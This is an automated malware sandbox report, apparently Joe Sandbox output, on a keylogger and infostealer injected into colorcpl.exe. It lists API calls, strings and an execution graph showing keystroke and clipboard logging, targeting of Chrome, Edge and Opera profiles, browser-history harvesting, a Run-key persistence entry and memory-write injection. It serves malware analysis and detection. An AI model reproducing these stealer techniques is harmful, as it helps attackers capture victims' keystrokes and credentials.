                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: Init_thread_footer$__onexit
                                        • String ID: T0F
                                        • API String ID: 1878262506-3557657896
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: __freea
                                        • String ID: H"G$H"GH"G
                                        • API String ID: 240046367-3036711414
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04A84046
                                          • Part of subcall function 04A99959: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,04AE9654,04A8BDCB,.vbs,?,?,?,?,?,04AF2200), ref: 04A99980
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04A840D5,?,?,04A840D5,04AE2E24), ref: 04A968BC
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04AE2E24,?,?,04A840D5,04AE2E24), ref: 04A968C5
                                          • Part of subcall function 04A9A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • Sleep.KERNEL32(000000FA,04AE2E24), ref: 04A84118
                                        Strings
                                        • /sort "Visit Time" /stext ", xrefs: 04A84092
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                        • String ID: /sort "Visit Time" /stext "
                                        • API String ID: 368326130-1573945896
                                        APIs
                                          • Part of subcall function 069164EA: _free.LIBCMT ref: 06916521
                                          • Part of subcall function 069164EA: _abort.LIBCMT ref: 06916568
                                          • Part of subcall function 0691D01C: _abort.LIBCMT ref: 0691D04E
                                          • Part of subcall function 0691D01C: _free.LIBCMT ref: 0691D082
                                        • _free.LIBCMT ref: 0691CF75
                                        • _free.LIBCMT ref: 0691CFAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: _free$_abort
                                        • String ID: pF
                                        • API String ID: 195396716-2973420481
                                        APIs
                                          • Part of subcall function 04AB2525: __onexit.LIBCMT ref: 04AB252B
                                        • __Init_thread_footer.LIBCMT ref: 04A8A6E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Init_thread_footer__onexit
                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                        • API String ID: 1881088180-3686566968
                                        APIs
                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,04ACEF72,?,00000050,?,?,?,?,?), ref: 04ACEDF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • String ID: ACP$OCP
                                        • API String ID: 0-711371036
                                        APIs
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0690B23F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: CallFilterFunc@8
                                        • String ID: @F$@F
                                        • API String ID: 4062629308-3436687868
                                        APIs
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0690B681
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallFilterFunc@8
                                        • String ID: @F$@F
                                        • API String ID: 4062629308-3436687868
                                        • Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                        • Instruction ID: 603274de467859bb7ae7e1993df42d13881488add31db0e24bea030ca7859775
                                        • Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                        • Instruction Fuzzy Hash: 3F216B71E102148FF7D8AB788C1176D33555F81334F244359E8319BAD8EB7A8942CB96
                                        APIs
                                        • GetLocalTime.KERNEL32(?,04AF24A8,?,00000000,?,?,?,?,?,?,04A946C2,?,00000001,0000004C,00000000), ref: 04A85010
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • GetLocalTime.KERNEL32(?,04AF24A8,?,00000000,?,?,?,?,?,?,04A946C2,?,00000001,0000004C,00000000), ref: 04A85067
                                        Strings
                                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 04A84FFF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: Connection KeepAlive | Enabled | Timeout:
                                        • API String ID: 481472006-507513762
                                        • Opcode ID: 9df96a8f6d6bc7a1653514e63780cbb70c058275affd7c5bc6b12a7ae3e0b84c
                                        • Instruction ID: a547f094b091a6872a3d617531f91b03b0134bae4615075fa46fb74f36f7a0ae
                                        • Opcode Fuzzy Hash: 9df96a8f6d6bc7a1653514e63780cbb70c058275affd7c5bc6b12a7ae3e0b84c
                                        • Instruction Fuzzy Hash: 5D21F6A2D002406FF705FB60995472B7BA8E7A9308F04059DEC4507281DB2EBE0AC7D3
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: XF
                                        • API String ID: 269201875-1082896132
                                        • Opcode ID: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
                                        • Instruction ID: da0768b16465ad9f45f894888e82e409ec890c42b741ca15a2b23914fd4f2168
                                        • Opcode Fuzzy Hash: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
                                        • Instruction Fuzzy Hash: 2B11B271E103105FE7A09B2ABC41B5636D8AB45B70F240636E971DFBE4F3B1D8864B86
                                        APIs
                                        • GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: | $%02i:%02i:%02i:%03i
                                        • API String ID: 481472006-2430845779
                                        • Opcode ID: 8d1bbcfcce405740bc4d09a0706d24f6da8c1f45c3f98fcf688394b449cbe95d
                                        • Instruction ID: 6e6ebf6e53dba37118d033c3758d0c3a7a86b4293ed9c593dad90bebadc4964c
                                        • Opcode Fuzzy Hash: 8d1bbcfcce405740bc4d09a0706d24f6da8c1f45c3f98fcf688394b449cbe95d
                                        • Instruction Fuzzy Hash: 2F1121715042046AD704FBA5D9548FFB7E8EB94208F500A1EF895861D1FF38FE4AC752
                                        APIs
                                          • Part of subcall function 04A8A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                          • Part of subcall function 04A8A0B0: wsprintfW.USER32 ref: 04A8A13F
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • CloseHandle.KERNEL32(?), ref: 04A89FFD
                                        • UnhookWindowsHookEx.USER32 ref: 04A8A010
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                        • String ID: Online Keylogger Stopped
                                        • API String ID: 1623830855-1496645233
                                        • Opcode ID: 5904fa3a42edeb8fc062141cf6e22795342b9d3c9c43773fe56096ed90e01c5c
                                        • Instruction ID: 664b47770d58a3166265fce173694bd580e63897aa8907d3eb64d1b510dcdd08
                                        • Opcode Fuzzy Hash: 5904fa3a42edeb8fc062141cf6e22795342b9d3c9c43773fe56096ed90e01c5c
                                        • Instruction Fuzzy Hash: 8A01F736A002006FFB257B78C90A7FE7BF5DB42215F40058ED48202581EBA63C57D7D6
                                        APIs
                                          • Part of subcall function 069164EA: _free.LIBCMT ref: 06916521
                                          • Part of subcall function 069164EA: _abort.LIBCMT ref: 06916568
                                        • _abort.LIBCMT ref: 0691D04E
                                        • _free.LIBCMT ref: 0691D082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _abort_free
                                        • String ID: pF
                                        • API String ID: 4174849134-2973420481
                                        • Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                        • Instruction ID: 167b6b8e3386c81c0008b6da526d6a30097469a488049bbfafdc8f0fe3b753b8
                                        • Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                        • Instruction Fuzzy Hash: C101C475D02629DBC7E1EF599800219B7A4BF44B20F35021AD9386BA80D7746A4BCFC6
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,04A8B604), ref: 04A8B4FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: AppData$\Opera Software\Opera Stable\
                                        • API String ID: 1174141254-1629609700
                                        • Opcode ID: 7a2e59d64ff0ac41a53157fd52a94274ba73291e7dfc4a3a8e447e3a1ecb8217
                                        • Instruction ID: 93aa3fe9e794d943c2debf708b9967a0ec72cb8fa5ffeb9161e6c3f1498fea5a
                                        • Opcode Fuzzy Hash: 7a2e59d64ff0ac41a53157fd52a94274ba73291e7dfc4a3a8e447e3a1ecb8217
                                        • Instruction Fuzzy Hash: 6AF08930901219A7AB04F7E1CE07CFF776CDF14A04B40005EA91252191EE55B94687E0
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,04A8B53E), ref: 04A8B437
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                        • API String ID: 1174141254-4188645398
                                        • Opcode ID: 9bb05b15b72027a29d773b63bcc5fae596ac2372221a70adf4cf737fb645d54e
                                        • Instruction ID: 164cb9572772f4cbc4e651349f9e706283d1599e681005e12a7cd5b7506a8f9d
                                        • Opcode Fuzzy Hash: 9bb05b15b72027a29d773b63bcc5fae596ac2372221a70adf4cf737fb645d54e
                                        • Instruction Fuzzy Hash: A1F0AE3090131567AF04F7E5DD17CFF772CEF10614B40005E6B1153581EE55784687E1
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,04A8B5A1), ref: 04A8B49A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                        • API String ID: 1174141254-2800177040
                                        • Opcode ID: 8f9c5731acdd3ed460ed11ab99fe291ca8a058f374e4239fa4a0cba1919767d1
                                        • Instruction ID: eb9819da975c4c70153c7473cd5d0fe2cade4e7517f49728d5a434716675ba80
                                        • Opcode Fuzzy Hash: 8f9c5731acdd3ed460ed11ab99fe291ca8a058f374e4239fa4a0cba1919767d1
                                        • Instruction Fuzzy Hash: 9CF08230A0121AA7AB04F7E5CE17CFF7B2CEB10604B40045EAB1292181EE59784687E1
                                        APIs
                                        • GetKeyState.USER32(00000011), ref: 04A8A597
                                          • Part of subcall function 04A89468: GetForegroundWindow.USER32 ref: 04A8949C
                                          • Part of subcall function 04A89468: GetWindowThreadProcessId.USER32(00000000,?), ref: 04A894A7
                                          • Part of subcall function 04A89468: GetKeyboardLayout.USER32(00000000), ref: 04A894AE
                                          • Part of subcall function 04A89468: GetKeyState.USER32(00000010), ref: 04A894B8
                                          • Part of subcall function 04A89468: GetKeyboardState.USER32(?), ref: 04A894C5
                                          • Part of subcall function 04A89468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 04A894E1
                                          • Part of subcall function 04A8962E: SetEvent.KERNEL32(?,?,00000000,04A8A156,00000000), ref: 04A8965A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                        • String ID: [AltL]$[AltR]
                                        • API String ID: 3195419117-2658077756
                                        • Opcode ID: 4cc25b5ab8f0ae89dff3f43c1ed57b5ff6964593a274b1b018f90f55fa58fe40
                                        • Instruction ID: c171e6b1350d791887eafbb7fc92b292ef1f7c3cf0dff932843a3906b57e0ba7
                                        • Opcode Fuzzy Hash: 4cc25b5ab8f0ae89dff3f43c1ed57b5ff6964593a274b1b018f90f55fa58fe40
                                        • Instruction Fuzzy Hash: D8E068727002201BAC2C333D6A2A6BE7D24CB46A60F80005EEC424B284EC5ABD8087D6
                                        APIs
                                        • GetKeyState.USER32(00000012), ref: 04A8A5F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State
                                        • String ID: [CtrlL]$[CtrlR]
                                        • API String ID: 1649606143-2446555240
                                        • Opcode ID: 365f7f0f47908061261ee6e99868a070f42311fc4d14d0fc9cee15584d687cd7
                                        • Instruction ID: 74ccefc36954b71d18692034fcdd7a1d20257ebb010b774a64cf8314989f7cbf
                                        • Opcode Fuzzy Hash: 365f7f0f47908061261ee6e99868a070f42311fc4d14d0fc9cee15584d687cd7
                                        • Instruction Fuzzy Hash: 51E07D317042111FD9143ABE561A67C6C20DB011A8F01002EEC8347189D84BB80207D2
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,04AF21E8,80000002,80000002,04A8BD02,00000000,?,04AF2200,pth_unenc,04AF21E8), ref: 04A92422
                                        • RegDeleteValueW.ADVAPI32(04AF21E8,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A92436
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 04A92420
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteOpenValue
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                        • API String ID: 2654517830-1051519024
                                        • Opcode ID: cbabdcaa5a2086aaa41132de1fe999ef9e655b89920135d3f361126602152c98
                                        • Instruction ID: 7d061a36a6cd12fdb7c64bf02b550c093c71db9d644e4075408d645f2a244863
                                        • Opcode Fuzzy Hash: cbabdcaa5a2086aaa41132de1fe999ef9e655b89920135d3f361126602152c98
                                        • Instruction Fuzzy Hash: D8E0C232254208BBEF104FB1DD07FFA37BCDB41B01F008694BD0692080D6269E059660
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,04A81D35), ref: 04ABB4DB
                                        • GetLastError.KERNEL32 ref: 04ABB4E9
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04ABB544
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 8d4474ad94704da48617488c7f98ce441a885d82b0bdf4fed22d0e4095b1620e
                                        • Instruction ID: 6c0f2c6d0f79f6aba217d68ada08ad20e809e835462106092d796fd4ffaaba42
                                        • Opcode Fuzzy Hash: 8d4474ad94704da48617488c7f98ce441a885d82b0bdf4fed22d0e4095b1620e
                                        • Instruction Fuzzy Hash: 8441D771600245AFDB218F64D844AEA7BBCEF09710F148259E9D75B5A2EB31F901CBF2
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 04A905F1
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 04A906BD
                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A906DF
                                        • SetLastError.KERNEL32(0000007E,04A90955), ref: 04A906F6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastRead
                                        • String ID:
                                        • API String ID: 4100373531-0
                                        • Opcode ID: bf384ac12d07166bbaba218bfd69aab438fc08239e0ee2645d5c83b8b5138729
                                        • Instruction ID: 7a6617d6f1cb94a9a2feddc5e1ae40ff9c65010791e7e6df388ce59e8d19f984
                                        • Opcode Fuzzy Hash: bf384ac12d07166bbaba218bfd69aab438fc08239e0ee2645d5c83b8b5138729
                                        • Instruction Fuzzy Hash: B3416B71608315DFEB208F29DC84B66B7E9FF88754F00482DEA8696651EBB1FD05CB11

                                        Execution Graph

                                        Execution Coverage: 7.4%
                                        Dynamic/Decrypted Code Coverage: 100%
                                        Signature Coverage: 0%
                                        Total number of Nodes: 170
                                        Total number of Limit Nodes: 15
                                        execution_graph 24439 2c71727 24440 2c7173c 24439->24440 24441 2c71968 24439->24441 24451 2c717cb Sleep 24440->24451 24453 2c7174e 24440->24453 24442 2c71938 24441->24442 24443 2c71a80 24441->24443 24447 2c71947 Sleep 24442->24447 24456 2c71986 24442->24456 24445 2c71684 VirtualAlloc 24443->24445 24446 2c71a89 24443->24446 24444 2c7175d 24448 2c716bf 24445->24448 24449 2c716af 24445->24449 24450 2c7195d Sleep 24447->24450 24447->24456 24463 2c71644 24449->24463 24450->24442 24451->24453 24455 2c717e4 Sleep 24451->24455 24452 2c7182c 24462 2c71838 24452->24462 24469 2c715cc 24452->24469 24453->24444 24453->24452 24457 2c7180a Sleep 24453->24457 24455->24440 24459 2c715cc VirtualAlloc 24456->24459 24460 2c719a4 24456->24460 24457->24452 24458 2c71820 Sleep 24457->24458 24458->24453 24459->24460 24464 2c71681 24463->24464 24465 2c7164d 24463->24465 24464->24448 24465->24464 24466 2c7164f Sleep 24465->24466 24467 2c71664 24466->24467 24467->24464 24468 2c71668 Sleep 24467->24468 24468->24465 24473 2c71560 24469->24473 24471 2c715d4 VirtualAlloc 24472 2c715eb 24471->24472 24472->24462 24474 2c71500 24473->24474 24474->24471 24475 2c71a8f 24476 2c71aa1 24475->24476 24477 2c71b6c 24475->24477 24479 2c71aa7 24476->24479 24482 2c71b13 Sleep 24476->24482 24478 2c716e8 24477->24478 24477->24479 24481 2c71c66 24478->24481 24483 2c71644 2 API calls 24478->24483 24480 2c71ab0 24479->24480 24485 2c71b4b Sleep 24479->24485 24489 2c71b81 24479->24489 24482->24479 24484 2c71b2d Sleep 24482->24484 24486 2c716f5 VirtualFree 24483->24486 24484->24476 24487 2c71b61 Sleep 24485->24487 24485->24489 24488 2c7170d 24486->24488 24487->24479 24490 2c71c00 VirtualFree 24489->24490 24491 2c71ba4 24489->24491 24492 2c9bb50 timeSetEvent 24493 2c9bb44 24496 2c8ec74 24493->24496 24497 2c8ec7c 24496->24497 24497->24497 26837 2c8870c LoadLibraryW 24497->26837 24499 2c8ec9e 24500 2c8eca3 24499->24500 24501 2c8ecad 24500->24501 24502 2c8ecb3 24501->24502 24503 2c8ecc8 24502->24503 24504 2c8ecb7 24502->24504 24506 2c74500 8 API calls 24503->24506 26851 2c74500 24504->26851 24507 2c8ecc6 24506->24507 26842 2c7480c 24507->26842 26857 2c880c8 26837->26857 26839 2c88745 26865 2c87d00 26839->26865 26843 2c7481d 26842->26843 26844 2c74843 26843->26844 26845 2c7485a 26843->26845 26846 2c74b78 8 API calls 26844->26846 26847 2c74570 8 API calls 26845->26847 26848 2c74850 26846->26848 26847->26848 26849 2c7488b 26848->26849 26850 2c74500 8 API calls 26848->26850 26850->26849 26852 2c74504 26851->26852 26854 2c74514 26851->26854 26852->26854 26855 2c74570 8 API calls 26852->26855 26853 2c74542 26853->24507 26854->26853 26911 2c72c2c 8 API calls 26854->26911 26855->26854 26858 2c74500 8 API calls 26857->26858 26859 2c880ed 26858->26859 26876 2c87914 26859->26876 26861 2c880fa 26862 2c8811a GetProcAddress GetProcAddress 26861->26862 26880 2c744d0 26862->26880 26866 2c74500 8 API calls 26865->26866 26867 2c87d25 26866->26867 26868 2c87914 8 API calls 26867->26868 26869 2c87d32 26868->26869 26902 2c88020 26869->26902 26872 2c880c8 10 API calls 26873 2c87d5b NtWriteVirtualMemory 26872->26873 26874 2c744d0 8 API calls 26873->26874 26875 2c87d94 FreeLibrary 26874->26875 26875->24499 26877 2c87925 26876->26877 26884 2c74b78 26877->26884 26879 2c87935 26879->26861 26882 2c744d6 26880->26882 26881 2c744fc 26881->26839 26882->26881 26901 2c72c2c 8 API calls 26882->26901 26886 2c74b85 26884->26886 26889 2c74bb5 26884->26889 26887 2c74b91 26886->26887 26890 2c74570 26886->26890 26887->26879 26895 2c744ac 26889->26895 26891 2c74574 26890->26891 26892 2c74598 26890->26892 26899 2c72c10 8 API calls 26891->26899 26892->26889 26894 2c74581 26894->26889 26896 2c744b2 26895->26896 26897 2c744cd 26895->26897 26896->26897 26900 2c72c2c 8 API calls 26896->26900 26897->26887 26899->26894 26900->26897 26901->26882 26903 2c74500 8 API calls 26902->26903 26904 2c88043 26903->26904 26905 2c87914 8 API calls 26904->26905 26906 2c88050 26905->26906 26907 2c880c8 10 API calls 26906->26907 26908 2c88069 GetModuleHandleA 26907->26908 26909 2c744ac 8 API calls 26908->26909 26910 2c87d55 26909->26910 26910->26872 26911->26853 26912 2c74e88 26913 2c74e95 26912->26913 26917 2c74e9c 26912->26917 26918 2c74be4 26913->26918 26921 2c74bfc 26917->26921 26919 2c74bdc 26918->26919 26920 2c74be8 SysAllocStringLen 26918->26920 26919->26917 26920->26919 26922 2c74c02 SysFreeString 26921->26922 26923 2c74c08 26921->26923 26922->26923 26924 2c76518 26925 2c76523 26924->26925 26928 2c74168 26925->26928 26927 2c7655d 26929 2c741ae 26928->26929 26930 2c7422c 26929->26930 26940 2c74100 26929->26940 26930->26927 26932 2c743fa 26930->26932 26933 2c743e9 26930->26933 26936 2c7443f FreeLibrary 26932->26936 26937 2c74463 26932->26937 26945 2c7432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26933->26945 26935 2c743f3 26935->26932 26936->26932 26938 2c74472 ExitProcess 26937->26938 26939 2c7446c 26937->26939 26939->26938 26941 2c74143 26940->26941 26942 2c74110 26940->26942 26941->26930 26942->26941 26944 2c715cc VirtualAlloc 26942->26944 26946 2c75814 26942->26946 26944->26942 26945->26935 26947 2c75824 GetModuleFileNameA 26946->26947 26948 2c75840 26946->26948 26950 2c75a78 GetModuleFileNameA RegOpenKeyExA 26947->26950 26948->26942 26951 2c75afb 26950->26951 26952 2c75abb RegOpenKeyExA 26950->26952 26968 2c758b4 6 API calls 26951->26968 26952->26951 26954 2c75ad9 RegOpenKeyExA 26952->26954 26954->26951 26955 2c75b84 lstrcpyn GetThreadLocale GetLocaleInfoA 26954->26955 26959 2c75c9e 26955->26959 26960 2c75bbb 26955->26960 26956 2c75b20 RegQueryValueExA 26957 2c75b62 RegCloseKey 26956->26957 26958 2c75b40 RegQueryValueExA 26956->26958 26957->26948 26958->26957 26961 2c75b5e 26958->26961 26959->26948 26960->26959 26962 2c75bcb lstrlen 26960->26962 26961->26957 26963 2c75be3 26962->26963 26963->26959 26964 2c75c08 lstrcpyn LoadLibraryExA 26963->26964 26965 2c75c30 26963->26965 26964->26965 26965->26959 26966 2c75c3a lstrcpyn LoadLibraryExA 26965->26966 26966->26959 26967 2c75c6c lstrcpyn LoadLibraryExA 26966->26967 26967->26959 26968->26956

                                        Control-flow Graph

                                        control_flow_graph 7738 2c75a78-2c75ab9 GetModuleFileNameA RegOpenKeyExA 7739 2c75afb-2c75b3e call 2c758b4 RegQueryValueExA 7738->7739 7740 2c75abb-2c75ad7 RegOpenKeyExA 7738->7740 7745 2c75b62-2c75b7c RegCloseKey 7739->7745 7746 2c75b40-2c75b5c RegQueryValueExA 7739->7746 7740->7739 7742 2c75ad9-2c75af5 RegOpenKeyExA 7740->7742 7742->7739 7743 2c75b84-2c75bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 7742->7743 7747 2c75c9e-2c75ca5 7743->7747 7748 2c75bbb-2c75bbf 7743->7748 7746->7745 7749 2c75b5e 7746->7749 7750 2c75bc1-2c75bc5 7748->7750 7751 2c75bcb-2c75be1 lstrlen 7748->7751 7749->7745 7750->7747 7750->7751 7752 2c75be4-2c75be7 7751->7752 7753 2c75bf3-2c75bfb 7752->7753 7754 2c75be9-2c75bf1 7752->7754 7753->7747 7756 2c75c01-2c75c06 7753->7756 7754->7753 7755 2c75be3 7754->7755 7755->7752 7757 2c75c30-2c75c32 7756->7757 7758 2c75c08-2c75c2e lstrcpyn LoadLibraryExA 7756->7758 7757->7747 7759 2c75c34-2c75c38 7757->7759 7758->7757 7759->7747 7760 2c75c3a-2c75c6a lstrcpyn LoadLibraryExA 7759->7760 7760->7747 7761 2c75c6c-2c75c9c lstrcpyn LoadLibraryExA 7760->7761 7761->7747
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02C75A94
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75AB2
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75AD0
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C75AEE
